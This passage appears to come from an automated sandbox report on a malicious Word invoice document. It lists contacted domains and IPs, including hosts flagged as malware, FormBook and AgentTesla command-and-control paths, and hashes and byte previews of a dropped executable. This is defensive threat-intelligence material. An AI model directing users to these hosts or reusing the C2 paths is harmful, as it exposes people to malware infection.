                                                            http://www.searchvity.com/dfrgui.exe, 00000008.00000002.629053445.0000000002D26000.00000004.10000000.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.0000000003306000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.477631592.00000000019E6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • 4%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkindfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://covid19help.top/EQNEDT32.EXE, 00000002.00000002.351925217.0000000000568000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • 26%, Virustotal, Browse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                                      		high
                                                                      http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.usertrust.EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              172.67.175.222
                                                                              		covid19help.topUnited States
                                                                              		13335CLOUDFLARENETUStrue
                                                                              194.9.94.86
                                                                              		www.xn--matfrmn-jxa4m.seSweden
                                                                              		39570LOOPIASEtrue
                                                                              45.33.6.223
                                                                              		www.sqlite.orgUnited States
                                                                              		63949LINODE-APLinodeLLCUSfalse
                                                                              54.38.220.85
                                                                              		www.kinkynerdspro.blogFrance
                                                                              		16276OVHFRtrue
                                                                              91.195.240.19
                                                                              		parkingpage.namecheap.comGermany
                                                                              		47846SEDO-ASDEfalse
                                                                              66.96.161.166
                                                                              		www.terelprime.comUnited States
                                                                              		29873BIZLAND-SDUStrue

                                                                              Private

                                                                              IP
                                                                              192.168.2.255

                                                                              General Information

                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                              Analysis ID:1441061
                                                                              Start date and time:2024-05-14 09:35:16 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 9m 59s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                              Number of analysed new started processes analysed:14
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Beauty_Stem_Invoice.doc
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.expl.evad.winDOC@11/15@12/7
                                                                              EGA Information:
                                                                              • Successful, ratio: 50%
                                                                              HCA Information:
                                                                              • Successful, ratio: 95%
                                                                              • Number of executed functions: 69
                                                                              • Number of non-executed functions: 83
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .doc
                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                              • Attach to Office via COM
                                                                              • Active ActiveX Object
                                                                              • Scroll down
                                                                              • Close Viewer

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                                                                              • Execution Graph export aborted for target EQNEDT32.EXE, PID 2396 because there are no executed function
                                                                              • Execution Graph export aborted for target gpgLFpElQuxhEi.exe, PID 2768 because it is empty
                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              09:36:03API Interceptor303x Sleep call for process: EQNEDT32.EXE modified
                                                                              09:36:07API Interceptor2x Sleep call for process: op33779.scr modified
                                                                              09:36:42API Interceptor1601x Sleep call for process: gpgLFpElQuxhEi.exe modified
                                                                              09:36:52API Interceptor1954371x Sleep call for process: dfrgui.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              172.67.175.222http://cya.nz/citizenzcomGet hashmaliciousUnknownBrowse
                                                                              • cya.nz/citizenzcom
                                                                              194.9.94.86MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                              • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                              SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                              • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                              PAY-0129.exeGet hashmaliciousFormBookBrowse
                                                                              • www.torentreprenad.com/s2u9/?7H=mTJ4yhH&qHaT0h=5U7DALWrxqzr56VTS66DkMzivwb8eJw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH0jqi0U2E5YHFFFQ==
                                                                              DHL_SOA_1004404989.exeGet hashmaliciousFormBookBrowse
                                                                              • www.torentreprenad.com/s2u9/?j8j=6NzlX4xHmtqH&rR=5U7DALWrxqzr56VMLK7KnfayygnCZIw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH3pN+aCUsxPyV8FA==
                                                                              Scan00516.jsGet hashmaliciousFormBook, MailPassView, WSHRATBrowse
                                                                              • www.acre-com.com/me15/?i8O=bxl0&VPudI=AMxDUnLLexuTfXRuHqoxzPfeXrfBw2lKu15RcCpXpuJEBCulcUbatn2YVJ6xbnCfmbZZ
                                                                              SHIPPINGDOCUMENTS.25.23.exeGet hashmaliciousFormBookBrowse
                                                                              • www.udda.app/ga36/?-Zk4Ah=uKy05ssFXwD7lx+pwOkpcz0JYvvlr0Fm4k7Q090T/1T8NUAbWqhr3VP8iMZHhaUYUaRp&-ZVd=5jo8nLy8
                                                                              g8G146l8XU.exeGet hashmaliciousFormBookBrowse
                                                                              • www.frostdal.se/s26y/?8pAlmdiX=882d78zUy4+UMlJ0mFcKU0FzzswBpgbUl63S0CTJJ7YYOy24S5YeYqbYAzkKlVaYLwFJ&h0DxKN=l4G4b
                                                                              Portfunktionen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.seansaren.com/8mkm/?YfxdA=0TBXZr6&8p9dCJU=dq4Bmr7ke09F/j6gqFBYy8hUF+OUtSAKtvg3uyO8Hql2Nxy80d4gIJwQmfcVpJqaQnb4Hw97lY925H1T11NKL9RBbHv3rBHVxw==
                                                                              shdybron2.1.exeGet hashmaliciousFormBookBrowse
                                                                              • www.giftr.online/sk29/?4hHxFhL=kIJ0w1eRhzsxIkY2EDI0ouQu9gQ5uAgdx+JFieQVw6ZUYc+rFfN6m9UPXTH9XP8rHUyw&n0=cRkX
                                                                              Hotel Order Booking.exeGet hashmaliciousFormBookBrowse
                                                                              • www.mariestadsturistbyra.com/8h9m/?4hChZVEp=POzhDC3cChJGiberk7iu0jitBnVtkIhI/7sU91OjKHP9uyI8Efo/vkBQlZgSUTycxndK9EogPlcv/zCu18J5OZVYs8G7lA7x0Q==&2dcD=CpcPID
                                                                              45.33.6.223APRILPR, 24.docGet hashmaliciousFormBookBrowse
                                                                              • www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
                                                                              Credit confirmation.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.sqlite.org/2016/sqlite-dll-win32-x86-3110000.zip
                                                                              Demand G2-2024.xlsxGet hashmaliciousFormBookBrowse
                                                                              • www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip
                                                                              PAYROLL.docGet hashmaliciousFormBookBrowse
                                                                              • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                              PAYROLL.docGet hashmaliciousFormBookBrowse
                                                                              • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                              Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                                              • www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip
                                                                              MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                              • www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
                                                                              EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                              • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                                              SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                              • www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
                                                                              SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              covid19help.topAPRILPR, 24.docGet hashmaliciousFormBookBrowse
                                                                              • 172.67.175.222
                                                                              FASO-PLAST0987654.docGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.21.83.128
                                                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.11595.10672.rtfGet hashmaliciousLokibotBrowse
                                                                              • 104.21.83.128
                                                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.3772.16087.rtfGet hashmaliciousLokibotBrowse
                                                                              • 104.21.83.128
                                                                              Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                                              • 172.67.175.222
                                                                              SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                              • 104.21.83.128
                                                                              Payment Swift.docGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.21.83.128
                                                                              Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                                              • 172.67.175.222
                                                                              Invoice.docGet hashmaliciousUnknownBrowse
                                                                              • 172.67.175.222
                                                                              New Quotation.docGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.175.222
                                                                              parkingpage.namecheap.comvnc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 91.195.240.19
                                                                              pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 91.195.240.19
                                                                              Stolprende.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 91.195.240.19
                                                                              orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 91.195.240.19
                                                                              Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 91.195.240.19
                                                                              098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 91.195.240.19
                                                                              WvwNJkZ8jcQuUnb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 91.195.240.19
                                                                              UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 91.195.240.19
                                                                              Transaction advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 91.195.240.19
                                                                              file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 91.195.240.19
                                                                              www.xn--matfrmn-jxa4m.seMOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.86
                                                                              SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.86
                                                                              NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.85
                                                                              alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.85
                                                                              AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.85
                                                                              Search.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 194.9.94.85

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              OVHFRhttps://1fuvj.trk.elasticemail.com/tracking/click?d=ncvS6hYUK5PEKCs-D4kJJ8GFXZUYGSF7fSefgGJuwpaSVriPt2Z_FcWRlmoVhtUZOwgvb5Y9f3iepTztVTtF2I8CgEemOdJ6C8zwX_XK1sFk4F5qXodZfF84JR7xqI0juVG3qxsB4fTepuOY4yLNUQM1Get hashmaliciousPhisherBrowse
                                                                              • 91.134.146.191
                                                                              http://Hanmesi.clickGet hashmaliciousUnknownBrowse
                                                                              • 54.39.156.32
                                                                              2mim34IfQZ.exeGet hashmaliciousAsyncRAT, PureLog Stealer, Xmrig, zgRATBrowse
                                                                              • 146.59.154.106
                                                                              http://www.immo4trans.deGet hashmaliciousUnknownBrowse
                                                                              • 51.79.154.29
                                                                              w85VkFOxiD.exeGet hashmaliciousPython Stealer, CStealer, NiceRAT, QuasarBrowse
                                                                              • 51.38.43.18
                                                                              Gj3ajUucBo.elfGet hashmaliciousMiraiBrowse
                                                                              • 164.132.7.54
                                                                              FaKcYgqu4i.elfGet hashmaliciousUnknownBrowse
                                                                              • 188.165.6.107
                                                                              ON4VDtFMWC.elfGet hashmaliciousMiraiBrowse
                                                                              • 192.99.119.231
                                                                              spss2Dwal5.elfGet hashmaliciousUnknownBrowse
                                                                              • 51.91.97.40
                                                                              oWOpDWITT1.elfGet hashmaliciousUnknownBrowse
                                                                              • 178.33.196.94
                                                                              LOOPIASEMOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.86
                                                                              SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.86
                                                                              NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.85
                                                                              alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.85
                                                                              AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.85
                                                                              Search.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 194.9.94.85
                                                                              PAY-0129.exeGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.86
                                                                              PgbcaAGOnA.exeGet hashmaliciousFormBookBrowse
                                                                              • 194.9.94.85
                                                                              admindemo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 194.9.94.85
                                                                              Order_N#U00b0_202200027.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 194.9.94.85
                                                                              CLOUDFLARENETUSAPRILPR, 24.docGet hashmaliciousFormBookBrowse
                                                                              • 172.67.140.176
                                                                              hesaphareket_1715688000.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.74.152
                                                                              http://www.iofferlouisvuitton.comGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              Inventory_list.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 104.26.12.205
                                                                              ET2431000075 & ET2431000076.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 172.67.148.22
                                                                              SecuriteInfo.com.FileRepMalware.14194.25025.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.26.0.5
                                                                              purchase order_9889689.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 172.67.148.22
                                                                              FOTO MULTA NACIONAL.vbsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                              • 104.21.57.139
                                                                              2280.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 104.26.13.205
                                                                              Requirements.xla.xlsxGet hashmaliciousAveMaria, UACMeBrowse
                                                                              • 172.67.215.45
                                                                              LINODE-APLinodeLLCUSAPRILPR, 24.docGet hashmaliciousFormBookBrowse
                                                                              • 45.33.6.223
                                                                              emsO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 45.56.79.23
                                                                              pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 139.162.5.234
                                                                              orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 139.162.5.234
                                                                              Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 139.162.5.234
                                                                              http://www.immo4trans.deGet hashmaliciousUnknownBrowse
                                                                              • 172.104.105.5
                                                                              22wonl2YIZeR0zX.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 45.79.19.196
                                                                              7Tat3LP3VY.msiGet hashmaliciousUnknownBrowse
                                                                              • 139.162.132.235
                                                                              Plata.docx.docGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                              • 45.33.110.13
                                                                              Credit confirmation.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 45.33.6.223

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              7dcce5b76c8b17472d024758970a406bAPRILPR, 24.docGet hashmaliciousFormBookBrowse
                                                                              • 172.67.175.222
                                                                              ET2431000075 & ET2431000076.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 172.67.175.222
                                                                              purchase order_9889689.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 172.67.175.222
                                                                              Requirements.xla.xlsxGet hashmaliciousAveMaria, UACMeBrowse
                                                                              • 172.67.175.222
                                                                              POXCopy.xlsGet hashmaliciousUnknownBrowse
                                                                              • 172.67.175.222
                                                                              Order2354.xlsGet hashmaliciousPrivateLoader, PureLog Stealer, RemcosBrowse
                                                                              • 172.67.175.222
                                                                              Normal.dotm.docGet hashmaliciousUnknownBrowse
                                                                              • 172.67.175.222
                                                                              HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
                                                                              • 172.67.175.222
                                                                              HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
                                                                              • 172.67.175.222
                                                                              950.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 172.67.175.222

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\sqlite3.dll2rv55ZT4QKGet hashmaliciousUnknownBrowse
                                                                                dWnj3zLFc4.exeGet hashmaliciousUnknownBrowse
                                                                                  dWnj3zLFc4.exeGet hashmaliciousUnknownBrowse
                                                                                    PAYMENT_DETAILS.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                      sfk_setup.exeGet hashmaliciousUnknownBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opszx[1].scr

                                                                                        Download File
                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):744448
                                                                                        Entropy (8bit):7.50104957045175
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:LIOQjIdmUO4AZ2bg/AKGsFxFW7sDSNUmUen:EOQE/3bzKGsLgOS+mUen
                                                                                        MD5:E81883368313FC5B3CC4D1F1F1889827
                                                                                        SHA1:13CA55C0A193F66678855229AFBF82A95A6D30DE
                                                                                        SHA-256:481FE3840D515D4D19D6FB16143AA6845B9DF798FE8D6C843297D34219CB14D0
                                                                                        SHA-512:A6136772F3D20747F59BEEC0CF7BDFA9901A47338FF34446A790A4AFA8F6621BB8A4F4382499D6FB85DEBFBFACE883733C8B8EEF740B7E3CDBF2D78110045660
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Reputation:low
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\...............0..P...........o... ........@.. ....................................@.................................4o..W.......:............................................................................ ............... ..H............text....O... ...P.................. ..`.rsrc...:............R..............@..@.reloc...............Z..............@..B................po......H.......................Hq..Lc..........................................&.(9.....*".......*J.~....t....(>...&*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(9....*.(.........(?...~....~....(....o@...oA....#......*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*>..(E.....}F...*:.(G.....}F...*>..(H.....}F...*B...(I.....}F...*>..(J....

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlite-dll-win32-x86-3130000[1].zip

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):432857
                                                                                        Entropy (8bit):7.998752412719792
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:kTIVVH3d4R4Xwi0y4OL5F3xGfi/CrsMWe6Y/Q3bQKTYTT1cAHKl0HIX0SXahmW:DVv4iXwi0yVL5FxGfjW/4dThmW
                                                                                        MD5:82949903C2FB1A5EDA9181B96800A472
                                                                                        SHA1:B1796BD0C2E7EAED79D1CD8D5DD90E02D491B43D
                                                                                        SHA-256:21EBD12C1AA68AA18F4BFDD7AE30D6D321747EE9D91E1D07926D11F2AE84A101
                                                                                        SHA-512:C12C980A6778A27F0F9F4266DD8432D5D3F12F3C2A8FA7F760381B3B37C662B71D39274C642E121B78542064E6C9CEA48217F808B4AB6A087EB15C27FA02E704
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:PK........$..H........=.......sqlite3.defUT...TM<WTM<Wux.........d.......6.@..73.....9.$..T.....b....R.......H..6..........~j...$...&"L.....T.,.).......O<....iUV.KO...b..sUx0...W..{c....<...8[\.5p.....l..]xa ..|.)Q..WJ......I......*t.6...F.<(...i.G..I..p.v..x.KO.n..7..}...h..Fe....)...*.$.......51f(..(.t...ZD.w...,/..=.*.....#)....p.Q..md.q..7\@.x..e....)Q....iQ..9.6u....ux]}.9YE....'O..I:cT...S.+..^.c..B...'.k.0.f.].F.l...5_....T.../.t.N.......|..9..%.&..>...........N..d...dEw......H*.r..g..3. .\...L.....u.'.....O.V..N,'.j...-...{..&..u"q=..[...D.'QW,..5..Px.I.)+...WK.y...B.....GV>.fF).G.u.#.w..X].F..F.G......K{;A.....q..?..q7.j..Nofr.V...oV.......N$u.I`...^.v.a..^....=^wmr..(a>uF....\.{}.....,.\....h.WX.....,.Lw..X.........2.{...z...$...9r9....m..@.Qv..!...2y./*..@zD.^.55..hA.;...W....)$>.xb.i....s3).UG..F..\]YH3.....N.x...;|}.=......a..8...l.Z.s...Fn.....p<...&8S....I.4...pIqq..UA..d..+"..8....qr....@.*.m.y.<D..~..bR..N..\..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{EA2263C8-9A1E-4290-9A8C-85184A93A722}.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3::
                                                                                        MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{14D1D7B1-C2DF-4C64-8F11-71D0A8980628}.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):176640
                                                                                        Entropy (8bit):3.4380808407702013
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:Jyemryemryemryemryemryemryemryemryemryemql:Jyemryemryemryemryemryemryemryej
                                                                                        MD5:32B89CAD6EA4BAADA32AEFFEF2A9513C
                                                                                        SHA1:2685D8C2B40A3AEEA2C1C729CE4FDFA965FEF065
                                                                                        SHA-256:4DD48B2D8E46559C9051BFC0E9BEDA31482921F8C6B12D58D24CA2B63152BD89
                                                                                        SHA-512:13015610A72ABB8E5E7D7609042F819C3F65DCB6CD49DE3D20D6AF294AA07D41550FA2B89D75C6BDA856E2189912500C8AD85EB6A53EEB3C32AB35618068DF9C
                                                                                        Malicious:false
